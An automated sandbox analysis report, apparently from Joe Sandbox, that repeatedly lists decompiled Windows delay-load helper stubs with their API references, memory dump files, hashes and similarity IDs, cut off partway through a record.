0x0101dc3d

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DC36

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 30778239edcfbe9af811d836155a230bbdf1a43e54d4b1cd402113a4c268e003
Instruction ID: 840210dfd39b936d65fe88c2ff259071ce03d86fcb6aaed52f881bcbd1fb3806
Opcode Fuzzy Hash: 30778239edcfbe9af811d836155a230bbdf1a43e54d4b1cd402113a4c268e003
Instruction Fuzzy Hash: 24B0129A27C203AC700C6189BC09E3A132CD2E0B10320490FB1C8D8004D4845C040631

Uniqueness

Uniqueness Score: -1.00%

Function 0101D91F, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101D91F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bdc4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101d89e
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: eb463f61737ef9862c2ac778b7078b448f8504a88748718ed3fd486a608dd952
Instruction ID: 6ba30933d63f374e049e0fd57a3b3396a75558767fde8d1f5b1f2b8bb6a79454
Opcode Fuzzy Hash: eb463f61737ef9862c2ac778b7078b448f8504a88748718ed3fd486a608dd952
Instruction Fuzzy Hash: B1A0029556D5037C710C71917D5DD7A161CC5D5955360451DB4CA94084A45459454531

Uniqueness

Uniqueness Score: -1.00%

Function 0101D93D, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101D93D() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bdc4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101d89e
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b4f569e2cd2f082457c0329f8f666797a24e7e3871e3c731541dbe2d7477f6c6
Instruction ID: 6ba30933d63f374e049e0fd57a3b3396a75558767fde8d1f5b1f2b8bb6a79454
Opcode Fuzzy Hash: b4f569e2cd2f082457c0329f8f666797a24e7e3871e3c731541dbe2d7477f6c6
Instruction Fuzzy Hash: B1A0029556D5037C710C71917D5DD7A161CC5D5955360451DB4CA94084A45459454531

Uniqueness

Uniqueness Score: -1.00%

Function 0101D951, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101D951() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bdc4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101d89e
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 171c011b45c638eea582118f85ac704c229a5b9d4e0b9fedf9817b04aea528f9
Instruction ID: 6ba30933d63f374e049e0fd57a3b3396a75558767fde8d1f5b1f2b8bb6a79454
Opcode Fuzzy Hash: 171c011b45c638eea582118f85ac704c229a5b9d4e0b9fedf9817b04aea528f9
Instruction Fuzzy Hash: B1A0029556D5037C710C71917D5DD7A161CC5D5955360451DB4CA94084A45459454531

Uniqueness

Uniqueness Score: -1.00%

Function 0101D95B, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101D95B() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bdc4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101d89e
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 91d1d5a09d74f67e50beb79da07f0f3da88928bcdc1a864e1c0fe9255d6e2dd2
Instruction ID: 6ba30933d63f374e049e0fd57a3b3396a75558767fde8d1f5b1f2b8bb6a79454
Opcode Fuzzy Hash: 91d1d5a09d74f67e50beb79da07f0f3da88928bcdc1a864e1c0fe9255d6e2dd2
Instruction Fuzzy Hash: B1A0029556D5037C710C71917D5DD7A161CC5D5955360451DB4CA94084A45459454531

Uniqueness

Uniqueness Score: -1.00%

Function 0101D965, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101D965() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bdc4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101d89e
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 887e9fb84d4155382d20698571123065e35f9a694d1492f3b7f9d2da299bdfdd
Instruction ID: 6ba30933d63f374e049e0fd57a3b3396a75558767fde8d1f5b1f2b8bb6a79454
Opcode Fuzzy Hash: 887e9fb84d4155382d20698571123065e35f9a694d1492f3b7f9d2da299bdfdd
Instruction Fuzzy Hash: B1A0029556D5037C710C71917D5DD7A161CC5D5955360451DB4CA94084A45459454531

Uniqueness

Uniqueness Score: -1.00%

Function 0101D96F, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101D96F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bdc4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101d89e
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 682421205b36b31c0af25441047b1ef8d132ececa69880434b0251ee1dafe371
Instruction ID: 6ba30933d63f374e049e0fd57a3b3396a75558767fde8d1f5b1f2b8bb6a79454
Opcode Fuzzy Hash: 682421205b36b31c0af25441047b1ef8d132ececa69880434b0251ee1dafe371
Instruction Fuzzy Hash: B1A0029556D5037C710C71917D5DD7A161CC5D5955360451DB4CA94084A45459454531

Uniqueness

Uniqueness Score: -1.00%

Function 0101D979, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101D979() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bdc4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101d89e
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d68997359611ccf603d52738a7f37541e44da5ca0a384847f755a0b6e0c759d3
Instruction ID: 6ba30933d63f374e049e0fd57a3b3396a75558767fde8d1f5b1f2b8bb6a79454
Opcode Fuzzy Hash: d68997359611ccf603d52738a7f37541e44da5ca0a384847f755a0b6e0c759d3
Instruction Fuzzy Hash: B1A0029556D5037C710C71917D5DD7A161CC5D5955360451DB4CA94084A45459454531

Uniqueness

Uniqueness Score: -1.00%

Function 0101D983, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101D983() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bdc4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101d89e
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dacb176b0e36fcbd7bb78d25d60ce118dbd83e82fe8e757fd8cbcc96ef530722
Instruction ID: 6ba30933d63f374e049e0fd57a3b3396a75558767fde8d1f5b1f2b8bb6a79454
Opcode Fuzzy Hash: dacb176b0e36fcbd7bb78d25d60ce118dbd83e82fe8e757fd8cbcc96ef530722
Instruction Fuzzy Hash: B1A0029556D5037C710C71917D5DD7A161CC5D5955360451DB4CA94084A45459454531

Uniqueness

Uniqueness Score: -1.00%

Function 0101D98D, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101D98D() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bdc4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101d89e
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 40b413375b0ecad3c844596f00f41572f6ac17ec3334dfc68d81c741e12e09e6
Instruction ID: 6ba30933d63f374e049e0fd57a3b3396a75558767fde8d1f5b1f2b8bb6a79454
Opcode Fuzzy Hash: 40b413375b0ecad3c844596f00f41572f6ac17ec3334dfc68d81c741e12e09e6
Instruction Fuzzy Hash: B1A0029556D5037C710C71917D5DD7A161CC5D5955360451DB4CA94084A45459454531

Uniqueness

Uniqueness Score: -1.00%

Function 0101D997, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101D997() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bdc4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101d89e
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 22afffaf4ad3021e62b5e6453f251125d9279ddf383014a77927fa9eb95cecf5
Instruction ID: 6ba30933d63f374e049e0fd57a3b3396a75558767fde8d1f5b1f2b8bb6a79454
Opcode Fuzzy Hash: 22afffaf4ad3021e62b5e6453f251125d9279ddf383014a77927fa9eb95cecf5
Instruction Fuzzy Hash: B1A0029556D5037C710C71917D5DD7A161CC5D5955360451DB4CA94084A45459454531

Uniqueness

Uniqueness Score: -1.00%

Function 0101D8D9, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101D8D9() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bdc4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101d89e
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 29ab01ada4cdbfbdea5c6babbbfae9a24ebe0db5efd2955a57909ad0f255b7ab
Instruction ID: 6ba30933d63f374e049e0fd57a3b3396a75558767fde8d1f5b1f2b8bb6a79454
Opcode Fuzzy Hash: 29ab01ada4cdbfbdea5c6babbbfae9a24ebe0db5efd2955a57909ad0f255b7ab
Instruction Fuzzy Hash: B1A0029556D5037C710C71917D5DD7A161CC5D5955360451DB4CA94084A45459454531

Uniqueness

Uniqueness Score: -1.00%

Function 0101DBF7, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101DBF7() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103be44); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101dbd0
0x0101dbd5
0x0101dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DBD5

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 45009dbfb16f5f30aee7d8ab0bd60783bba8a02817ef76ccc0832c7911d8e578
Instruction ID: 96ae190853a7bfa4491c54ddf5d3ee9f8e7e8da4ecfea41d796b1fdb7c5cdf24
Opcode Fuzzy Hash: 45009dbfb16f5f30aee7d8ab0bd60783bba8a02817ef76ccc0832c7911d8e578
Instruction Fuzzy Hash: 2EA011AA2BC003BC3008228A3C0EC3A022CE2C0A20320880EA08A88008A8A80C080230

Uniqueness

Uniqueness Score: -1.00%

Function 0101DAA5, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0101DAA5() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x103bde4); // executed
				E0101DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0101daad
0x0101dab2
0x0101dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DAB2

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5ecd892488d224fda8916b53e1fcfd8c313c670c99eb78e7ddca1b3f4c0e1fc1
Instruction ID: ef6a768199106abcfc285a03cad0f2c3ad14a5a52cde74ba74952a174136da23
